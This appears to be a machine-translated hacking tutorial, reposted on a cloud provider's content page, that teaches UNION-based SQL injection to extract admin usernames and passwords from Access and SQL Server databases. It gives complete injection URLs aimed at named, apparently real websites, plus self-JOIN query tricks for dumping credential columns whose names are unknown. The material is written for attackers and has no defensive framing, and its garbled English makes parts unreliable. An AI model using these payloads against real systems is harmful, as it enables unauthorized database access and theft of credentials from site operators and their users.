Get access, SQL Server, and other database data directly

Source: Internet
Author: User
Tags execution join joins sql injection table name access database
access|server| Data | database
Get access, SQL Server, and other database data directly
Author:mix
Pst
PH4NT0M Security Team
http://www.ph4nt0m.org


When you inject access with SQL, you often encounter problems with passwords that are Chinese and don't guess the key field names. This technique can be used to solve such problems very quickly. The minimum technical requirements are two:

1. There is a SQL injection vulnerability in a system using an Access database, and the MSSQL database supports this technology
2. You need to know the table name of the table where the data is being exploded and a field name under this table, which is typically an ID field

The obvious advantage of using this technique is that:

1. You may not need ' quotes, filter ' quotes have no effect on this technology
2. Can quickly know the content of sensitive data, and do not have the same as in the past to guess slowly, Chinese, special characters and so on all kill
3. You can still quickly get sensitive data content after SQL Server has blocked the error message
4. You can still get the information you want to know without knowing the key (to know the data) field name

At first glance, this technique may be difficult, but it is very simple. A total of two difficulties, the general first difficulty after seeing the results are very easy to think, but the second difficulty is indeed a little bit of trouble.

First look at a table, is the union of the syntax. This is also the main principle of data burst. As shown in the following illustration:



When we insert the Union statement using the SQL inject technique, as long as the two select queries get the same number of columns, the resulting query results become the data after the union select after the execution of the entire SQL statement is completed. So it's possible to explode the data we need. Let's look at a simple example:

Http://www.chinakj.com/SoftView.asp?SoftID=3903%20union%20select%20username,password,1,1,1%20from%20admin

This is a server for SQL Server that turns off the return of error messages, so it is not possible to get sensitive data directly from previous methods. After inserting the Union statement via SQL inject, you can boldly guess that the executed SQL statement becomes:

SELECT * FROM Soft where softid=3903 union select username,password,1,1,1 from admin

Then under normal circumstances to display soft 1th, 2 fields is worth the place will display the admin username and password fields, the following 3 1 is also the same substitution. According to this characteristic, we can certainly also directly get the username and password fields in the Admin_userinfo table. The constructed statement looks like this:

"" >http://www.chinakj.com/softview.asp? Softid=3903%20union%20select%20username,password,1,1,1%20from%20admin_userinfo%20where%20username<> '

The above is a simple use of union to achieve the acquisition of sensitive data, rather than through complex violent dismantling. In order to achieve the purpose of not knowing that the field name can get the same data, we should of course think of using * instead of the field name. That way, as long as the field represented by the number of fields plus a few 1 numbers is the same as the number of fields in the Select query table in the script, you can also get data that does not know the field name.

Given such a situation, there is a statement: Select Id,hit,softname,softurl from soft where id=10. The fields that are normally displayed in the Web page are softname and softurl, so we should adjust the location of the * when we use union, the structure in the General admin table is ID username password, The SQL statement should be constructed when injecting the above hypothetical statement: Select 1,* from admin. The username and Pssword fields replaced by * are in the position of the Softname and Softurl two fields so that the Web page can make the username and password fields obediently. Of course, here is just one of the simplest examples to illustrate that there are many times a table and a table may have more than 10 fields, I encountered the longest is 43 fields. So if you use SELECT * in the script to do the query, we should construct the union select with 1 Dine to 43 fields. Of course there are some fields that are not displayed by the Web page, which takes into account the position of the * number behind the union select. I don't think I need to say more about this.

The syntax described above perfectly conforms to SQL Server. But access and SQL Server are really dwarfed. In SQL Server, the collection of records that we query with the Select *,1,1,1 from admin statement is: * 1 1 1, respectively. But the result of the query above in Access is 1 1 1 *, which means that no matter where you place the * in the middle of the group 1, the data represented is always at the end of the query result. Use a complex point example to illustrate:

Http://www.hnp2p.com/mov/view.asp?id=1916%20union%20 (select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from% 20admin)

This site is using an Access database, you can see the normal display of the fields are 2, 3, 7, 8, 10, 11, and the following fields will not be shown, remove 14,15,16 *, the page also shows the number, that is, admin in the number of fields is three, is definitely the ID Username password this structure, but no other fields except the ID field can be guessed by name. It is not feasible in access to move the position of the * number in order to be able to burst the sensitive data in the way that is used in SQL Server above. The reason is that access always places the fields that are replaced by * well in the last side of the query dataset. The results of access queries are always: 1,2,3,4,5,6,7,8,9,10,11,12,13,*. In order to represent the fields that are replaced by the * good, we must move the field replaced by * to another location. First look at the results:

Http://www.hnp2p.com/mov/view.asp?id=1916%20union%20select%201,*%20from%20 ((admin%20as%20a%20inner%20join% 20admin%20as%20b%20on%20a.id=b.id)%20inner%20join%20admin%20as%20c%20on%20c.id=b.id)%20inner%20join%20admin% 20as%20d%20on%20d.id=c.id)%20inner%20join%20admin%20as%20e%20on%20d.id=e.id

With the execution of such a constructed statement, the final query gets the data form
1 2 3 4 5 6 7 8 9 10 11 12 13 14-15 16
1,a.id a.name a.pwd b.id b.name b.pwd c.id c.name c.pwd d.id d.name d.pwd e.id e.name e.pwd

The 3rd and 7th fields are exactly the values we want for the username and password fields. Here I use the join syntax, which joins (adds) the two tables to construct a query result that satisfies our requirements.

Joins are divided into all joins, left join and right joins, and the specific difference is to see the SQL syntax. Here, in Access, regardless of which connection method we choose, the effect is equal to all the connections. Look at a simple join syntax

SELECT *
From (table 1 INNER JOIN table 2 on table 1. ordinal = table 2. Ordinal)
INNER JOIN Table 3
On table 1. Serial number = Table 3. Serial number

Converting to an instance is:

Select 1,2,3,4,*
From ((admin as a inner join admin as B on a.id=b.id)
Inner JOIN admin as C on c.id=b.id)
Inner JOIN admin as D on d.id=c.id

In this format, you can solve the SQL statement that is actually executed by the URL above, which is to use join to connect the data table admin, and then to fill in the previous number of fields. As long as the statement is built properly, all data that does not know the field name can be displayed on the page. This is the difficulty of this technology.

All right, all of them are finished. If you want to write this technology into the program, it is also very possible. Only in the sentence structure when the best use of the human brain it ~ ~ ~ OH


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.